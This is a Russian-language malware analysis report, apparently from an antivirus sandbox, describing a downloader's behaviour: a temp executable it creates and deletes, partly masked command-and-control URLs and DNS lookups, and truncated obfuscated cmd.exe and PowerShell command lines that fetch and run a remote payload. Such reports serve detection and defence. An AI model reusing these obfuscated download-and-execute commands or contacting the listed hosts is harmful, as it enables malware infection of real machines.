Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set DRzl=A_oQM+{%;hNHZ4.6Y Fm3Tl8xbG=nj~iJ,qW17wUe$tO@PE(k\9}:g-a'B2fcpCvy)sXuLIDV5zS0\rd&&for %f in (61,2,38,7,45,39,57,69,70,62,52,30,73,33,36,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\172.exe
Удаляет следующие файлы
- %TEMP%\172.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://be###vega.com/5kHlMGxAbssU_i3YAv
- http://ip#b.ir/LXXmnXsEIzp62Vu
- http://we####.#152.goserver.host/oDTCp1bNQ42L
- http://www.we####.#152.goserver.host/oDTCp1bNQ42L
- http://as###nry.co.uk/blog/upload/aIUdTJvohVXmZEI_wTOWYwde
UDP
- DNS ASK ar####qe.beget.tech
- DNS ASK be###vega.com
- DNS ASK br###bucket.com
- DNS ASK ip#b.ir
- DNS ASK do#####ark.mrdomain.ir
- DNS ASK we####.#152.goserver.host
- DNS ASK as###nry.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set DRzl=A_oQM+{%;hNHZ4.6Y Fm3Tl8xbG=nj~iJ,qW17wUe$tO@PE(k\9}:g-a'B2fcpCvy)sXuLIDV5zS0\rd&&for %f in (61,2,38,7,45,39,57,69,70,62,52,30,73,33,36,...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set DRzl=A_oQM+{%;hNHZ4.6Y Fm3Tl8xbG=nj~iJ,qW17wUe$tO@PE(k\9}:g-a'B2fcpCvy)sXuLIDV5zS0/rd&&for %f in (61,2,38,7,45,39,57,69,70,62,52,30,73,33,36,7,78,7,75,46,75,75,70,43,10,10,0,4,46,52...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u3482='j1648';$d157=new-object Net.WebClient;$n3495='http://ar####qe.beget.tech/XrG1F6F2N_6yHn@http://bellevega.com/5kHlMGxAb...
- '<SYSTEM32>\cmd.exe'
